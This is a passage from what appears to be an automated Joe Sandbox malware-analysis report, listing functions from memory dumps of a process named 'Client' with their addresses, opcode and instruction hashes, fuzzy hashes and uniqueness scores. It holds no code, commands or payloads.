                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eb0458e9d0c042ac2caf2480f35e77405df381accf56a7dd9c9db6654aa6a186
                                                    • Instruction ID: 2367f52a896d5a5c37490f9c9f4d2c48533116b2b850775f34119a2cb549289d
                                                    • Opcode Fuzzy Hash: eb0458e9d0c042ac2caf2480f35e77405df381accf56a7dd9c9db6654aa6a186
                                                    • Instruction Fuzzy Hash: 6111C074900129EFCB65DFA0DC89A9CBBB5BB88300F1595E6D40EA7624DB306EC1CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E5FDB0 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bfa717b21b5d7c721a3b68959ede22457b5c04fdad94bf9dfd3e3731b4e736eb
                                                    • Instruction ID: c87d20b45e2314d5fd0aa5373a90f8c55627cc0a32dd040ce73ad2ac05a20254
                                                    • Opcode Fuzzy Hash: bfa717b21b5d7c721a3b68959ede22457b5c04fdad94bf9dfd3e3731b4e736eb
                                                    • Instruction Fuzzy Hash: 37F02B797090515B83088A2EE9948A6BFEFE7CA220348D577E209CB75EDF34DD06C750
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E5F168 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7452f450d86f5a557d758996c94ca5e82bc72c7e137f43ccbe70295aa143c041
                                                    • Instruction ID: 3354d932ecd66eb51aa459e5c582af0bea745ef5403653b90935a09b773c0cd6
                                                    • Opcode Fuzzy Hash: 7452f450d86f5a557d758996c94ca5e82bc72c7e137f43ccbe70295aa143c041
                                                    • Instruction Fuzzy Hash: 6DF0C8757080645F8308EB6AED448A77FDBD7C9254344D577E609CB69DC630EC0187A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B5C8C0 Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e296558b2d2727610b3e79131a531455a1c5422973f58b830fef9095831ca55a
                                                    • Instruction ID: d13b8b59a56dd3d5eee0790c6477ebaf785f175f42b36618dcd4cc8e18884e87
                                                    • Opcode Fuzzy Hash: e296558b2d2727610b3e79131a531455a1c5422973f58b830fef9095831ca55a
                                                    • Instruction Fuzzy Hash: C5F02B31B082249B930CDA3AE984856BFEFA7C561935582BBD609DB75DCA30EC0687D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E5F8E0 Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d4461dd3ef7935461f51d0e8113d9b952d00340f504c8de19b29d35b84bdb8f
                                                    • Instruction ID: 66db6c94d4d219176b8d292585ebc0f95637ae601cacdf71a346315986d72bc1
                                                    • Opcode Fuzzy Hash: 5d4461dd3ef7935461f51d0e8113d9b952d00340f504c8de19b29d35b84bdb8f
                                                    • Instruction Fuzzy Hash: F5F024307062488BC34DEA39DE404667B97A7C2285359D57BD5068BB6DCB31EC16CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E407CF Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e5a1a9777fda67bd8f4e134e21043479c4e7c5e28c676dddec67d4d9bec4ec3
                                                    • Instruction ID: fb7de9c4ec622f8c04d27fadbe634f49a8f50d4dfec8ee3443f5f05ee93a0f3c
                                                    • Opcode Fuzzy Hash: 1e5a1a9777fda67bd8f4e134e21043479c4e7c5e28c676dddec67d4d9bec4ec3
                                                    • Instruction Fuzzy Hash: 8511A274D04218CFCB1ADF60DD984DCBBB5BB98301F1195AAD60AAB394DB706E81CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E40DDB Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f0a90ae98a1d5575ae4946b6a0da6eb6b1814f0ca5744b343cd8c6ea66aaed9f
                                                    • Instruction ID: 8d18f29044ac760c2509c175124675fb04a3d816e59f5211d49229de34b434dc
                                                    • Opcode Fuzzy Hash: f0a90ae98a1d5575ae4946b6a0da6eb6b1814f0ca5744b343cd8c6ea66aaed9f
                                                    • Instruction Fuzzy Hash: DE11D774901218EFCB69EFA0ED9899CBBB5BB4C301F1145E5D40AA7364DB355E84CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E40EAC Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a727bc03383d91993ffd9ed639923cd3ce40da9d930e932ecb00b55e454b34d
                                                    • Instruction ID: 1dc2941bec99cc2b674ee7f57818c2f9a73106313aa34737d366fb322393822c
                                                    • Opcode Fuzzy Hash: 0a727bc03383d91993ffd9ed639923cd3ce40da9d930e932ecb00b55e454b34d
                                                    • Instruction Fuzzy Hash: 1111D474D01229DFCB29EFA0DD995D8BBB5FB98300F0085E9D90AA7264DB746E81CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E40F7D Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ad040238682547ab2d09a56f0ac1c53eec35a5e77f1637b62a0f619c45bccf6
                                                    • Instruction ID: 4764a8fc7697ad9835e89c42dd42e8654c4bd42998ab0811ab6fb7deabb6cd3a
                                                    • Opcode Fuzzy Hash: 4ad040238682547ab2d09a56f0ac1c53eec35a5e77f1637b62a0f619c45bccf6
                                                    • Instruction Fuzzy Hash: C711EC75904269AFCB19EFA0DD4D59CBBB5BB88301F0085E9D40AA7364DB305E85CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E40331 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 10a1a7fc03a89d6fcaa0753f9ca635e85bc84954edc8c1d8edb104ba87c58f7f
                                                    • Instruction ID: d67055541cfaba8ec465c648b8f8640c6da25672f68d369afd460a3a61ebc667
                                                    • Opcode Fuzzy Hash: 10a1a7fc03a89d6fcaa0753f9ca635e85bc84954edc8c1d8edb104ba87c58f7f
                                                    • Instruction Fuzzy Hash: 5111D4749002288FCB29DF60ED595D8BBB5BB8C740F1059E9D40AA7264DB786FC1CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B52EB7 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16a272f69feb5d480c21dfbe0072320b33d5687d8ca9eeff05cfd91856864e78
                                                    • Instruction ID: e1e85a33871fd49c5c54108543c9b3c8d3a119ec5c89a5a042afbdbfa9b028b8
                                                    • Opcode Fuzzy Hash: 16a272f69feb5d480c21dfbe0072320b33d5687d8ca9eeff05cfd91856864e78
                                                    • Instruction Fuzzy Hash: 34014831E042288FDB58DF75C95069DBBF0AB8A315F1240D5D949FB350DB30AD808F92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B5C640 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 69595740592bbe17de7be96b9bb5e7d77a825bae08dc8720c3a792ea538f464a
                                                    • Instruction ID: 56aa2ecbfe8819498e6ba9d84cc2be4bfb536ff792ca34ffc66cce89d38d0a6d
                                                    • Opcode Fuzzy Hash: 69595740592bbe17de7be96b9bb5e7d77a825bae08dc8720c3a792ea538f464a
                                                    • Instruction Fuzzy Hash: 47F089783062044F8308D72ED9405557BD7A7CA351358E5FAD509CB758DB31DD45C750
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E5F448 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a722a2efa6f37cf988d10bdaf7d9cd1cf59300cb99dcbf76aa1387b3cd99a51
                                                    • Instruction ID: de9efe6aa4f33ad4012670563c6aa0d30ebdad3384ad751c9659d2484bd9dab4
                                                    • Opcode Fuzzy Hash: 0a722a2efa6f37cf988d10bdaf7d9cd1cf59300cb99dcbf76aa1387b3cd99a51
                                                    • Instruction Fuzzy Hash: ABF02436B090245B870CAB29AA40862BBAFD7C9610309E037D9059F7AACA349C068BC0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C6C9E0 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955803392.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c60000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 94273b09895f79ca1291f652fa607889f1dc73d97b434477a0b72e10d62f4494
                                                    • Instruction ID: 11b29e6b623de391470fadd43e49d55562b701aadcbe60b5fdfe0af3bd437c0f
                                                    • Opcode Fuzzy Hash: 94273b09895f79ca1291f652fa607889f1dc73d97b434477a0b72e10d62f4494
                                                    • Instruction Fuzzy Hash: A0F097393061588BC308DA2DEA608623B9BA7C220834CC47FD90ACBB0DDA31EC00C7D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E4354A Relevance: .0, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 452820cdef564e3f03459c7dc8e645c1f8f7caa3ad0d1b9c4bbc9588a3d60975
                                                    • Instruction ID: 6a4b5ef53741c7ecaf79efc52b3d6f8c0a7c65a59a47db8c214d7000f9f12d82
                                                    • Opcode Fuzzy Hash: 452820cdef564e3f03459c7dc8e645c1f8f7caa3ad0d1b9c4bbc9588a3d60975
                                                    • Instruction Fuzzy Hash: 78015E74F022198FCB64DB749A60ABD77F26BD8108F1004DAC449BB790EE319D908F40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B5C980 Relevance: .0, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4000450b3463365796790c6a1bb88fee9f6bde654c783f57ce80c51586d31223
                                                    • Instruction ID: 270b75349235f04663924b63077d6f3a4a3f86367ae2e610a6993977eef1a6a8
                                                    • Opcode Fuzzy Hash: 4000450b3463365796790c6a1bb88fee9f6bde654c783f57ce80c51586d31223
                                                    • Instruction Fuzzy Hash: C7F0E2343042408B8709DB29E9408AA7F97D7C5311359D4B7D1068F75CCB30DC058B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B5DBE0 Relevance: .0, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93766b714483384deaf06442577a08391d14005dfa42a07cf435adee5f28dc15
                                                    • Instruction ID: 29edd054d68dcd9fcc33be0f9dd21019c5a227bede2017951c8596b558a13574
                                                    • Opcode Fuzzy Hash: 93766b714483384deaf06442577a08391d14005dfa42a07cf435adee5f28dc15
                                                    • Instruction Fuzzy Hash: 37F082787040554B8718DB2EE9444657BDBD7C9351345D5B7D50ACF359DB30DC018651
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B5C810 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 557991c4be620db25246edf73c42df26d8ca85719ad169ac413e85cd012e5197
                                                    • Instruction ID: 3b55b3cca340603a460d64899e50190770b37cbc862f3d79386e888c169602f0
                                                    • Opcode Fuzzy Hash: 557991c4be620db25246edf73c42df26d8ca85719ad169ac413e85cd012e5197
                                                    • Instruction Fuzzy Hash: 04F05538B052004F9308EFAAED444657BE3E3C6210318D5E2C6058FB1CCB71EC028BE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E417E3 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40ed5f50aa8e6eb4182388f671d0665e1808e8680c8f11f298e0f1f2154328a1
                                                    • Instruction ID: 2fcf63b403c1a38a3be4a618f5a9d2a1efbe4386c32c0293dcc8b43273fa84cc
                                                    • Opcode Fuzzy Hash: 40ed5f50aa8e6eb4182388f671d0665e1808e8680c8f11f298e0f1f2154328a1
                                                    • Instruction Fuzzy Hash: 27016938A04210CFCB59DF24D994958FBF2FB88304F149489D909AB368DB30AD81CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B53FFE Relevance: .0, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cbaad7c58d7501d62e5f6e50b0518326442093c43301bf1992c36477d395a505
                                                    • Instruction ID: ca7f3a54c62c302eb255b6d9112505ab24b56df4d9cd6f53838e0bbdd18f8565
                                                    • Opcode Fuzzy Hash: cbaad7c58d7501d62e5f6e50b0518326442093c43301bf1992c36477d395a505
                                                    • Instruction Fuzzy Hash: F7F09775E042288FCB54DF74C558698BBF1AF49315F1644E9D50AEB760DF34AE808F41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00D02FD7 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947067483.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_d00000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 23ce3fee582294998fba06567e627715edb37ef3703ec4f71c8ae3abb93511f1
                                                    • Instruction ID: 2b0bc0f3f3acecac9d6b9fe4720606c82b3bf29ce0a48e6f3b1b6e8436d8ad64
                                                    • Opcode Fuzzy Hash: 23ce3fee582294998fba06567e627715edb37ef3703ec4f71c8ae3abb93511f1
                                                    • Instruction Fuzzy Hash: 20F039B0E14608CFDB08EFA4C481A9EBBF6EF84704B958569C518EF765DB31A841CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B52E62 Relevance: .0, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 865ffe4c40f02df71104fa62321041f95cc32670789514f6eb8e44fe2690295e
                                                    • Instruction ID: c5965a6848f903841cda9d3d2f4383df0fd2ee92dc82941e7e92f18001f2ff39
                                                    • Opcode Fuzzy Hash: 865ffe4c40f02df71104fa62321041f95cc32670789514f6eb8e44fe2690295e
                                                    • Instruction Fuzzy Hash: A3E0C971E042248FDB18DF35D56469D7BB0AB89314F0200D9DA09EB660DB30AD408F51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E4346A Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb1e2e1c6a5ab4d1dc156458d7aa3c16e6c4607c3482a5fe6730e6272f3a3b6a
                                                    • Instruction ID: 2f9305906b056f1e3801efe8057ca56e1cf343db9b51734e4b88a4ab6749b3c2
                                                    • Opcode Fuzzy Hash: bb1e2e1c6a5ab4d1dc156458d7aa3c16e6c4607c3482a5fe6730e6272f3a3b6a
                                                    • Instruction Fuzzy Hash: 3CE08C34B042048FCB49DF20E454668BBA1AB86244B0464E9C85A9F340EB32BE42CF81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04E434C7 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 662e7b668064c116c976844891c255c637455c6ef838177a05dbbea1af253952
                                                    • Instruction ID: 62a5bb3750a14e61446f65a1d45e0992105d60328efb47c9e88fdf6af87a98ae
                                                    • Opcode Fuzzy Hash: 662e7b668064c116c976844891c255c637455c6ef838177a05dbbea1af253952
                                                    • Instruction Fuzzy Hash: 84E0EC34A042009FCB49DF60D894968B7B2FB89304B149498D84D9B364DB31AD82DF41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 00B59EF0 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 'aO$65N
                                                    • API String ID: 0-3547228216
                                                    • Opcode ID: 5710d5d353ccb79c86de0d48264d51a66048c6d926037e5baf20b2f7e49d06e1
                                                    • Instruction ID: a6db7babeaa726f95e6499b24e4822e42debb724d810b858971b8034b63128a7
                                                    • Opcode Fuzzy Hash: 5710d5d353ccb79c86de0d48264d51a66048c6d926037e5baf20b2f7e49d06e1
                                                    • Instruction Fuzzy Hash: 8B61E431A04105CFC70CDBB4C6906ADBBE6ABCA314B9555EAD902FF394DB306D08AB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B56C10 Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: wUZH
                                                    • API String ID: 0-2240337694
                                                    • Opcode ID: 05c54b3d514c5254bdb1ba28692c35018abb4c7f383275c4f7a82535da1338bd
                                                    • Instruction ID: fcfa56d58e75ac82950efb9baf793a5d4f75d7030a11bc084d6a694a0d6440ec
                                                    • Opcode Fuzzy Hash: 05c54b3d514c5254bdb1ba28692c35018abb4c7f383275c4f7a82535da1338bd
                                                    • Instruction Fuzzy Hash: 21D19071A042188FCB18DF34DAA06AD7BF6AB99204F6544EAC50AEB754EF309E458F41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001FA060 Relevance: .3, Instructions: 299COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74d1d71b5818b8e1505d822d6f1c3d3e8d7ecbe7f1aa30ef9cf14eab2d71f322
                                                    • Instruction ID: 9dd4b9ac0f82ddbab2e24aa810190a1a94ff6b741ca4c3b00ba8df3532ae2cda
                                                    • Opcode Fuzzy Hash: 74d1d71b5818b8e1505d822d6f1c3d3e8d7ecbe7f1aa30ef9cf14eab2d71f322
                                                    • Instruction Fuzzy Hash: 10C10675A04259CFCB05CFA5C8908EEBBF3FF89300B1585AAE5499B261D734ED91CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B59CB0 Relevance: .1, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9e41eadd5a7daeff47c37b715892a49c4c4632bf3e95e0aa348d7628f20c0f22
                                                    • Instruction ID: b33db6c752c679b32603b3880bb7e4bd1b2c324dbd0d80aacabfee5afef4f10f
                                                    • Opcode Fuzzy Hash: 9e41eadd5a7daeff47c37b715892a49c4c4632bf3e95e0aa348d7628f20c0f22
                                                    • Instruction Fuzzy Hash: 9441A331B08259CFD70CDF34CA8166ABBE6ABC670075595AAC502AF358DE309D099B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B5A4E8 Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6469036fbe9e4c07e274b149272709f4b3faf6b0a462ea24e9d85ae5ae2cae4b
                                                    • Instruction ID: ca34de4e1997d9f13536a240d8fa0cf84b5d3f4eb95109660c01e4afe402a1a9
                                                    • Opcode Fuzzy Hash: 6469036fbe9e4c07e274b149272709f4b3faf6b0a462ea24e9d85ae5ae2cae4b
                                                    • Instruction Fuzzy Hash: 33412631E041058FC718DFB1D9904AEBBF7BBC921076585AAC902FB398EF30AD058B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B59AE0 Relevance: .1, Instructions: 107COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da3e7f344a1ee7171c55aea03056b1942e05a55f5c76131c028fdacba297a429
                                                    • Instruction ID: 8877f2ba93d21ffe201e75a494be5b427eab523a123fd6f3ab65f2a2b85c63cd
                                                    • Opcode Fuzzy Hash: da3e7f344a1ee7171c55aea03056b1942e05a55f5c76131c028fdacba297a429
                                                    • Instruction Fuzzy Hash: 0A31D235708085CBC30CDB78D9C066A7FA7A7C63417A5D5A9C6079F39CDE70AD0A8BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B59920 Relevance: .1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d92e2d8cfef8b7b2af1a77afa09c2977b78062515cdd301eac96965f67be81a4
